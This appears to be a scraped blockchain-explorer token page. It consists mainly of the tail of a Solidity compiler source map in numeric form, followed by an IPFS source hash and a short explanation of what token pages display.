;;36021:30:0;;;;;35889:18;;36021:30;35732:327;35686:373;:::o;42427:115::-;37841:19;:17;:19::i;:::-;42519:15:::1;42531:2;-1:-1:-1::0;;;;;35263:16:0;;35259:74;;35303:18;;-1:-1:-1;;;35303:18:0;;;;;;;;;;;35259:74;35370:6;:8;;;;;;;;:6;35438:12;;;:8;:12;;;;;;-1:-1:-1;;;;;35438:12:0;:26;35434:81;;35488:15;;-1:-1:-1;;;35488:15:0;;;;;;;;;;;35434:81;35527:12;;;;:8;:12;;;;;;;;:17;;-1:-1:-1;;;;;;35527:17:0;-1:-1:-1;;;;;35527:17:0;;;;;;;;35555:10;;;:6;:10;;;;;:19;;-1:-1:-1;35555:19:0;;;;;;;;;;;;;;;35603:10;;:17;;:21;;-1:-1:-1;35603:21:0;:::i;:::-;35585:15;;;;:11;:15;;;;;;:39;;;;35642:28;;35597:2;;-1:-1:-1;;;;;35642:28:0;;;;;35585:15;;35642:28;35248:430;35204:474;:::o;14:250:1:-;99:1;109:113;123:6;120:1;117:13;109:113;;;199:11;;;193:18;180:11;;;173:39;145:2;138:10;109:113;;;-1:-1:-1;;256:1:1;238:16;;231:27;14:250::o;269:396::-;418:2;407:9;400:21;381:4;450:6;444:13;493:6;488:2;477:9;473:18;466:34;509:79;581:6;576:2;565:9;561:18;556:2;548:6;544:15;509:79;:::i;:::-;649:2;628:15;-1:-1:-1;;624:29:1;609:45;;;;656:2;605:54;;269:396;-1:-1:-1;;269:396:1:o;670:180::-;729:6;782:2;770:9;761:7;757:23;753:32;750:52;;;798:1;795;788:12;750:52;-1:-1:-1;821:23:1;;670:180;-1:-1:-1;670:180:1:o;1063:173::-;1131:20;;-1:-1:-1;;;;;1180:31:1;;1170:42;;1160:70;;1226:1;1223;1216:12;1241:254;1309:6;1317;1370:2;1358:9;1349:7;1345:23;1341:32;1338:52;;;1386:1;1383;1376:12;1338:52;1409:29;1428:9;1409:29;:::i;:::-;1399:39;1485:2;1470:18;;;;1457:32;;-1:-1:-1;;;1241:254:1:o;1874:328::-;1951:6;1959;1967;2020:2;2008:9;1999:7;1995:23;1991:32;1988:52;;;2036:1;2033;2026:12;1988:52;2059:29;2078:9;2059:29;:::i;:::-;2049:39;;2107:38;2141:2;2130:9;2126:18;2107:38;:::i;:::-;2097:48;;2192:2;2181:9;2177:18;2164:32;2154:42;;1874:328;;;;;:::o;2396:347::-;2461:6;2469;2522:2;2510:9;2501:7;2497:23;2493:32;2490:52;;;2538:1;2535;2528:12;2490:52;2561:29;2580:9;2561:29;:::i;:::-;2551:39;;2640:2;2629:9;2625:18;2612:32;2687:5;2680:13;2673:21;2666:5;2663:32;2653:60;;2709:1;2706;2699:12;2653:60;2732:5;2722:15;;;2396:347;;;;;:::o;2748:186::-;2807:6;2860:2;2848:9;2839:7;2835:23;2831:32;2828:52;;;2876:1;2873;2866:12;2828:52;2899:29;2918:9;2899:29;:::i;2939:808::-;3036:6;3044;3052;3060;3068;3121:3;3109:9;3100:7;3096:23;3092:33;3089:53;;;3138:1;3135;3128:12;3089:53;3161:29;3180:9;3161:29;:::i;:::-;3151:39;;3209:38;3243:2;3232:9;3228:18;3209:38;:::i;:::-;3199:48;;3294:2;3283:9;3279:18;3266:32;3256:42;;3349:2;3338:9;3334:18;3321:32;3372:18;3413:2;3405:6;3402:14;3399:34;;;3429:1;3426;3419:12;3399:34;3467:6;3456:9;3452:22;3442:32;;3512:7;3505:4;3501:2;3497:13;3493:27;3483:55;;3534:1;3531;3524:12;3483:55;3574:2;3561:16;3600:2;3592:6;3589:14;3586:34;;;3616:1;3613;3606:12;3586:34;3661:7;3656:2;3647:6;3643:2;3639:15;3635:24;3632:37;3629:57;;;3682:1;3679;3672:12;3629:57;2939:808;;;;-1:-1:-1;2939:808:1;;-1:-1:-1;3713:2:1;3705:11;;3735:6;2939:808;-1:-1:-1;;;2939:808:1:o;3752:260::-;3820:6;3828;3881:2;3869:9;3860:7;3856:23;3852:32;3849:52;;;3897:1;3894;3887:12;3849:52;3920:29;3939:9;3920:29;:::i;:::-;3910:39;;3968:38;4002:2;3991:9;3987:18;3968:38;:::i;:::-;3958:48;;3752:260;;;;;:::o;4017:127::-;4078:10;4073:3;4069:20;4066:1;4059:31;4109:4;4106:1;4099:15;4133:4;4130:1;4123:15;4149:922;4218:6;4271:2;4259:9;4250:7;4246:23;4242:32;4239:52;;;4287:1;4284;4277:12;4239:52;4327:9;4314:23;4356:18;4397:2;4389:6;4386:14;4383:34;;;4413:1;4410;4403:12;4383:34;4451:6;4440:9;4436:22;4426:32;;4496:7;4489:4;4485:2;4481:13;4477:27;4467:55;;4518:1;4515;4508:12;4467:55;4554:2;4541:16;4576:2;4572;4569:10;4566:36;;;4582:18;;:::i;:::-;4657:2;4651:9;4625:2;4711:13;;-1:-1:-1;;4707:22:1;;;4731:2;4703:31;4699:40;4687:53;;;4755:18;;;4775:22;;;4752:46;4749:72;;;4801:18;;:::i;:::-;4841:10;4837:2;4830:22;4876:2;4868:6;4861:18;4916:7;4911:2;4906;4902;4898:11;4894:20;4891:33;4888:53;;;4937:1;4934;4927:12;4888:53;4993:2;4988;4984;4980:11;4975:2;4967:6;4963:15;4950:46;5038:1;5016:15;;;5033:2;5012:24;5005:35;;;;-1:-1:-1;5020:6:1;4149:922;-1:-1:-1;;;;;4149:922:1:o;5076:380::-;5155:1;5151:12;;;;5198;;;5219:61;;5273:4;5265:6;5261:17;5251:27;;5219:61;5326:2;5318:6;5315:14;5295:18;5292:38;5289:161;;5372:10;5367:3;5363:20;5360:1;5353:31;5407:4;5404:1;5397:15;5435:4;5432:1;5425:15;5289:161;;5076:380;;;:::o;5461:127::-;5522:10;5517:3;5513:20;5510:1;5503:31;5553:4;5550:1;5543:15;5577:4;5574:1;5567:15;5593:128;5660:9;;;5681:11;;;5678:37;;;5695:18;;:::i;5726:127::-;5787:10;5782:3;5778:20;5775:1;5768:31;5818:4;5815:1;5808:15;5842:4;5839:1;5832:15;5858:127;5919:10;5914:3;5910:20;5907:1;5900:31;5950:4;5947:1;5940:15;5974:4;5971:1;5964:15;6550:290;6619:6;6672:2;6660:9;6651:7;6647:23;6643:32;6640:52;;;6688:1;6685;6678:12;6640:52;6714:16;;-1:-1:-1;;;;;;6759:32:1;;6749:43;;6739:71;;6806:1;6803;6796:12;6845:168;6918:9;;;6949;;6966:15;;;6960:22;;6946:37;6936:71;;6987:18;;:::i;7018:662::-;-1:-1:-1;;;;;7297:15:1;;;7279:34;;7349:15;;7344:2;7329:18;;7322:43;7396:2;7381:18;;7374:34;;;7444:3;7439:2;7424:18;;7417:31;;;7464:19;;7457:35;;;7222:4;7485:6;7535;7259:3;7514:19;;7501:49;7600:1;7594:3;7585:6;7574:9;7570:22;7566:32;7559:43;7670:3;7663:2;7659:7;7654:2;7646:6;7642:15;7638:29;7627:9;7623:45;7619:55;7611:63;;7018:662;;;;;;;;:::o;7811:1020::-;7987:3;8016:1;8049:6;8043:13;8079:36;8105:9;8079:36;:::i;:::-;8134:1;8151:18;;;8178:133;;;;8325:1;8320:356;;;;8144:532;;8178:133;-1:-1:-1;;8211:24:1;;8199:37;;8284:14;;8277:22;8265:35;;8256:45;;;-1:-1:-1;8178:133:1;;8320:356;8351:6;8348:1;8341:17;8381:4;8426:2;8423:1;8413:16;8451:1;8465:165;8479:6;8476:1;8473:13;8465:165;;;8557:14;;8544:11;;;8537:35;8600:16;;;;8494:10;;8465:165;;;8469:3;;;8659:6;8654:3;8650:16;8643:23;;8144:532;;;;;8707:6;8701:13;8723:68;8782:8;8777:3;8770:4;8762:6;8758:17;8723:68;:::i;:::-;8807:18;;7811:1020;-1:-1:-1;;;;7811:1020:1:o;8836:545::-;8938:2;8933:3;8930:11;8927:448;;;8974:1;8999:5;8995:2;8988:17;9044:4;9040:2;9030:19;9114:2;9102:10;9098:19;9095:1;9091:27;9085:4;9081:38;9150:4;9138:10;9135:20;9132:47;;;-1:-1:-1;9173:4:1;9132:47;9228:2;9223:3;9219:12;9216:1;9212:20;9206:4;9202:31;9192:41;;9283:82;9301:2;9294:5;9291:13;9283:82;;;9346:17;;;9327:1;9316:13;9283:82;;;9287:3;;;8836:545;;;:::o;9557:1352::-;9683:3;9677:10;9710:18;9702:6;9699:30;9696:56;;;9732:18;;:::i;:::-;9761:97;9851:6;9811:38;9843:4;9837:11;9811:38;:::i;:::-;9805:4;9761:97;:::i;:::-;9913:4;;9977:2;9966:14;;9994:1;9989:663;;;;10696:1;10713:6;10710:89;;;-1:-1:-1;10765:19:1;;;10759:26;10710:89;-1:-1:-1;;9514:1:1;9510:11;;;9506:24;9502:29;9492:40;9538:1;9534:11;;;9489:57;10812:81;;9959:944;;9989:663;7758:1;7751:14;;;7795:4;7782:18;;-1:-1:-1;;10025:20:1;;;10143:236;10157:7;10154:1;10151:14;10143:236;;;10246:19;;;10240:26;10225:42;;10338:27;;;;10306:1;10294:14;;;;10173:19;;10143:236;;;10147:3;10407:6;10398:7;10395:19;10392:201;;;10468:19;;;10462:26;-1:-1:-1;;10551:1:1;10547:14;;;10563:3;10543:24;10539:37;10535:42;10520:58;10505:74;;10392:201;-1:-1:-1;;;;;10639:1:1;10623:14;;;10619:22;10606:36;;-1:-1:-1;9557:1352:1:o;10914:422::-;11003:1;11046:5;11003:1;11060:270;11081:7;11071:8;11068:21;11060:270;;;11140:4;11136:1;11132:6;11128:17;11122:4;11119:27;11116:53;;;11149:18;;:::i;:::-;11199:7;11189:8;11185:22;11182:55;;;11219:16;;;;11182:55;11298:22;;;;11258:15;;;;11060:270;;;11064:3;10914:422;;;;;:::o;11341:806::-;11390:5;11420:8;11410:80;;-1:-1:-1;11461:1:1;11475:5;;11410:80;11509:4;11499:76;;-1:-1:-1;11546:1:1;11560:5;;11499:76;11591:4;11609:1;11604:59;;;;11677:1;11672:130;;;;11584:218;;11604:59;11634:1;11625:10;;11648:5;;;11672:130;11709:3;11699:8;11696:17;11693:43;;;11716:18;;:::i;:::-;-1:-1:-1;;11772:1:1;11758:16;;11787:5;;11584:218;;11886:2;11876:8;11873:16;11867:3;11861:4;11858:13;11854:36;11848:2;11838:8;11835:16;11830:2;11824:4;11821:12;11817:35;11814:77;11811:159;;;-1:-1:-1;11923:19:1;;;11955:5;;11811:159;12002:34;12027:8;12021:4;12002:34;:::i;:::-;12072:6;12068:1;12064:6;12060:19;12051:7;12048:32;12045:58;;;12083:18;;:::i;:::-;12121:20;;11341:806;-1:-1:-1;;;11341:806:1:o;12152:140::-;12210:5;12239:47;12280:4;12270:8;12266:19;12260:4;12239:47;:::i;12297:125::-;12362:9;;;12383:10;;;12380:36;;;12396:18;;:::i;13270:217::-;13310:1;13336;13326:132;;13380:10;13375:3;13371:20;13368:1;13361:31;13415:4;13412:1;13405:15;13443:4;13440:1;13433:15;13326:132;-1:-1:-1;13472:9:1;;13270:217::o;13492:135::-;13531:3;13552:17;;;13549:43;;13572:18;;:::i;:::-;-1:-1:-1;13619:1:1;13608:13;;13492:135::o

Swarm Source

ipfs://5e582a6e2a89539917363bbb61de8a78c5e7b6557cd04216214d3b181bcc5ce9
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.